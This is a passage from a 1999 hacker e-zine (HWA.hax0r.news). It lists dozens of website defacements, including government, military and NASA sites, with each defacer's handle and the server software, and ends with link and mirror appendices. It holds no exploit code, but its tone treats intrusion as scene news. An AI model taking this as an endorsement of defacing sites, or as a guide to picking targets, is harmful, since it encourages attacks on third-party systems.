      Operating System: Windows NT
      
      Previously Hacked
      Defaced domain: acquisition.jpl.nasa.gov
      Site Title: Jet Propulsion Labs NASA 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov 
      Defaced by: JLM 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Previously defaced on 99.10.26 by phreak.nl
      
      Defaced domain: www.whataburger.com
      Site Title: Whataburger Restaurants 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whataburger.com 
      Defaced by: klept0 
      Operating System: Linux
      
      Defaced domain: www.asesor.com.pe 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.asesor.com.pe 
      Defaced by: xhostile/acidklown 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.spyconnection.com
      Site Title: Spy Connection 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.spyconnection.com 
      Defaced by: `defcon 
      Operating System: BSDI
      
      Defaced domain: www.wireless.ee
      Site Title: Phreak.nl 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.wireless.ee 
      Defaced by: Phreak.nl 
      Operating System: Windows 95
      
      Defaced domain: www.oab.org.br
      Site Title: Ordem dos Advogados do Brasil 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.oab.org.br 
      Defaced by: inferno.br 
      Operating System: Windows NT
      
      Defaced domain: www.fabrisia.com
      Site Title: Fabrisia Cronin 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.fabrisia.com 
      Defaced by: Analognet 
      Operating System: Linux
      
      Defaced domain: www.rayee.com
      Site Title: Rayee 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.rayee.com 
      Defaced by: Analognet 
      Operating System: BSDI
      
      Defaced domain: www.streamingcam.com
      Site Title: Straming Cam 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.streamingcam.com 
      Defaced by: Analognet 
      Operating System: BSDI
      
      Defaced domain: www.compunetcgi.com
      Site Title: Compunet Computer Group 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.compunetcgi.com 
      Defaced by: Evil Entity 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: whv1.warnervideo.com
      Site Title: Warner Home Video 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/whv1.warnervideo.com 
      Defaced by: etC 
      Operating System: Solaris 2.5.x (Netscape-Enterprise/2.0a)
      
      Defaced domain: www.dds.be 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.dds.be 
      Defaced by: sacudo69 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
      
      Previously Hacked
      Defaced domain: www.hg.com.cn
      Site Title: HG China 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.hg.com.cn 
      Defaced by: kryptek 
      Operating System: Solaris
      Attrition comment: 2nd time defaced
      HIDDEN comments in the HTML.
      
      Previously Hacked
      Defaced domain: www.nukleer.gov.tr
      Site Title: Cekmece Nuclear Research and Training Center 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.nukleer.gov.tr 
      Defaced by: oystr-n-klam 
      Operating System: Linux
      Attrition comment: 2nd time defaced
      
      Defaced domain: www.latino-market.com
      Site Title: Millennium Computers 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.latino-market.com 
      Defaced by: p4riah 
      Operating System: WIndows NT
      
      Defaced domain: bodystore.nu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/bodystore.nu 
      Defaced by: I.R.C. 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.investigationresources.com
      Site Title: Investigative Resources Agency 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.investigationresources.com 
      Defaced by: ytcracker 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: mass hack
      
      Previously Hacked
      Defaced domain: www.esdcinc.com
      Site Title: ESDC Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.esdcinc.com 
      Defaced by: Floghe 
      Operating System: Windows NT
      
      Defaced domain: www.thomashosp.com
      Site Title: Thomas Hosp 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.thomashosp.com 
      Defaced by: w0lf 
      Operating System: Irix
      
      Defaced domain: www.lottoteam.de 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.lottoteam.de 
      Defaced by: r00tabega 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
      
      Defaced domain: www.familyheartbeat.org
      Site Title: electr0n 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.familyheartbeat.org 
      Defaced by: electr0n 
      Operating System: BSDI
      
      Defaced domain: www.phifersystems.com
      Site Title: Phifer Systems, Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.phifersystems.com 
      Defaced by: ytcracker 
      Operating System: Linux
      
      Defaced domain: www.barat.edu
      Site Title: Barat College 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.barat.edu 
      Defaced by: phiber 
      Operating System: Windows NT
      
      Defaced domain: west.medicdata.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/west.medicdata.com 
      Defaced by: ytcracker 
      Operating System: Red Hat Linux (Apache 1.3.6)
      
      Defaced domain: www.car-4sale.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.car-4sale.com 
      Defaced by: ytcracker 
      Operating System: BSDI 3.0 (Apache 1.2.6)
      
      Defaced domain: tfcnews.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/tfcnews.com 
      Defaced by: Hate Inc 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.ahcg.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.ahcg.com 
      Defaced by: xhostile & acidklown 
      Operating System: MacOS (AppleShareIP/6.0.0)
      
      Defaced domain: www.globefilm.com.au
      Site Title: Globe Film 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.globefilm.com.au 
      Defaced by: xhostile & acidk|own 
      Operating System: Windows NT
      
      Defaced domain: www.calcapital.com
      Site Title: Cal Capital 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.calcapital.com 
      Defaced by: hV2k 
      Operating System: BSDI
      
      Defaced domain: stace.commed.ru
      Site Title: Commed Web Hosting 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/stace.commed.ru 
      Defaced by: ytcracker 
      Operating System: Linux
      
      Defaced domain: www.toystory2.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.toystory2.net 
      Defaced by: zeroc 
      Operating System: BSDI (Apache 1.3.6)
      
      Defaced domain: www.uni-net.co.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.uni-net.co.uk 
      Defaced by: RETURN OF APOCALYPSE 
      Operating System: Solaris 2.6 - 2.7 (Apache 1.2.4)
      HIDDEN comments in the HTML.
      
      Previously Hacked
      Defaced domain: www.lottoteam.de
      Site Title: Lotto Team 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.lottoteam.de
      Defaced by: Fuby 
      Operating System: Irox
      Attrition comment: 2nd time defaced
      HIDDEN comments in the HTML.
      
      Defaced domain: www.m-hip.com
      Site Title: McDermit Combined Schools 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.m-hip.com 
      Defaced by: Fuby 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.pornography.com
      Site Title: Atlantis Management Group 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.pornography.com 
      Defaced by: Sploit 
      Operating System: Windows NT (IIS/4.0)
      
      Previously Hacked
      Defaced domain: tfcnews.com
      Site Title: TFC News 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/tfcnews.com 
      Defaced by: p4riah 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Yes, it really was hacked.
      
      Defaced domain: unix.webgraphics.com
      Site Title: Worldwide Web Graphics 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/unix.webgraphics.com 
      Defaced by: Nitr0BurN 
      Operating System: Linux (Apache 1.3.4)
      
      Defaced domain: www.ivcsnet.net
      Site Title: Imperial Valley Computer Service 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.ivcsnet.net 
      Defaced by: p4riah 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: mars.assiniboinec.mb.ca 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/mars.assiniboinec.mb.ca 
      Defaced by: nitroburn 
      Operating System: Linux (Apache 1.2.6)
      
      Defaced domain: radius.preferred.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/radius.preferred.com 
      Defaced by: nitroburn 
      Operating System: Linux (Apache 1.3.3)
      
      Defaced domain: www.socioambiental.org
      Site Title: Instituto Socioambiental 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.socioambiental.org 
      Defaced by: c3zar 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
      
      Defaced domain: www.optimumsettings.com
      Site Title: CEO Software, Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.optimumsettings.com 
      Defaced by: wkD 
      Operating System: Linux (Apache/1.3.4)
      
      Defaced domain: coldwellbankerj-s.com
      Site Title: Coldwell Banker Justrom & Stromme 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/coldwellbankerj-s.com 
      Defaced by: DHC 
      Operating System: Linux (Apache 1.2.4)
      
      Defaced domain: www.themillcasino.com
      Site Title: The Mill Casino 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.themillcasino.com 
      Defaced by: DHC 
      Operating System: Linux (Apache 1.2.4)
      
      Defaced domain: www.pioneerimplement.com
      Site Title: Pioneer Implement 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.pioneerimplement.com 
      Defaced by: DHC 
      Operating System: Linux (Apache 1.2.4)
      
      Defaced domain: www.schedulerplus.com
      Site Title: CEO Software 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.schedulerplus.com 
      Defaced by: wkD 
      Operating System: Linux (Apache 1.3.4)
      
      Defaced domain: www.votedbest.com
      Site Title: Irmo News 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.votedbest.com 
      Defaced by: Uneek 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.indev.nic.in 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.indev.nic.in 
      Defaced by: c0rvus 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: beta.intuit.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/beta.intuit.com 
      Defaced by: Uneek Technologies 
      Operating System: Windows NT (WebSitePro/1.1h)
      
      Defaced domain: www.css.com
      Site Title: Consult Supply Support 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.css.com 
      Operating System: FreeBSD 2.2.1 - 3.0
      Attrition comment: Defacement implies site was RM'd
      
      Defaced domain: www.bhv.hn 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.bhv.hn 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.swoya.com
      Site Title: Boys & Girls Club of Southwestern Oregon 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.swoya.com 
      Defaced by: DHC 
      Operating System: Linux
      
      Defaced domain: www.mtb.gov.br
      Site Title: Ministerio do Trabalho e do Emprego 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.mtb.gov.br 
      Defaced by: inferno.br 
      Operating System: Windows NT
      
      Defaced domain: www.kdcq.com
      Site Title: K-Dock Oldies 93.5 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.kdcq.com 
      Defaced by: DHC 
      Operating System: Linux
      
      Defaced domain: www.trt6.gov.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.trt6.gov.br 
      Defaced by: Einstein 
      Operating System: WinNT
      
      Defaced domain: www.memphischamber.com
      Site Title: Towery Publishing 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.memphischamber.com 
      Defaced by: bansh33 and Analognet 
      Operating System: Irix

      Previously Hacked
      Defaced domain: www.salton-maxim.com
      Site Title: Samantha Dreimann 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.salton-maxim.com 
      Defaced by: p4riah 
      Operating System: WinNT
      
      Previously Hacked
      Defaced domain: www.hwa.net
      Site Title: Hoefer WYSOCKI Architects  
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.hwa.net 
      Defaced by: n4rfy 
      Operating System: WinNT
      
      Defaced domain: www.cuztom.com
      Site Title: Cuztom Incorporated 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.cuztom.com 
      Defaced by: cipher 
      Operating System: WinNT
      
      Defaced domain: www.ordsvy.gov.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ordsvy.gov.uk 
      Defaced by: Sarin 
      Operating System: Windows NT (IIS/4.0)
      HIDDEN comments in the HTML
      
      Defaced domain: www.nctsjax.navy.mil
      Site Title: Navy Computer and Telecommunications Station, Jacksonvile FLorida  
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.nctsjax.navy.mil 
      Defaced by: s01o and k-0s 
      Operating System: Windows NT
      
      Defaced domain: aoc.gov
      Site Title: The Architect of the United States Capitol 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/aoc.gov 
      Defaced by: Verb0 
      Operating System: Windows NT
      
      Defaced domain: cpma.apg.army.mil
      Site Title: Civilian Personnel Operations Center Management Agency 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/cpma.apg.army.mil 
      Defaced by: s01o and k-0s 
      Operating System: Windows NT
      
      Previously Hacked
      Defaced domain: www.learncomm.org
      Site Title: Kiel Woodward Associates 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.learncomm.org 
      Defaced by: DHC 
      Operating System: Irix
      
      Defaced domain: www.zetcom.ru
      Site Title: Zetcom 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.zetcom.ru 
      Defaced by: Z0omer 
      Operating System: Windows NT
      
      Previously Hacked
      Defaced domain: www.pietersburg.org.za 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.pietersburg.org.za 
      Defaced by: aKt0r & DajinX 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Previously defaced on 99.09.18 by 139_r00ted - one of 11 .za domains hacked
      
      Previously Hacked
      Defaced domain: www.asesor.com.pe 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.asesor.com.pe 
      Defaced by: bean0 
      Operating System: Windows NT (IIS/4.0)
      Attrition comment: Previously defaced on 99.11.29 by acidkl0wn
      
      Defaced domain: www.colts.com
      Site Title: National Football League 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.colts.com 
      Defaced by: Tr1pl3 S31S 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.isaltda.com.uy 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.isaltda.com.uy 
      Defaced by: m0zy 
      Operating System: Windows NT (Lotus-Domino/Versi�n-4.6.3a)
      
      Defaced domain: www.ta-eng.com
      Site Title: TA Engineering 
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ta-eng.com 
      Defaced by: himi 
      Operating System: Windows NT (IIS/4.0)
       
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
       
       



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*

              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      
      Columbia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net                                   
                      
      Finland ........http://hackunlimited.com/                
                      
      Germany ........http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa ...http://www.hackers.co.za       
                      http://www.hack.co.za            
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    � 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]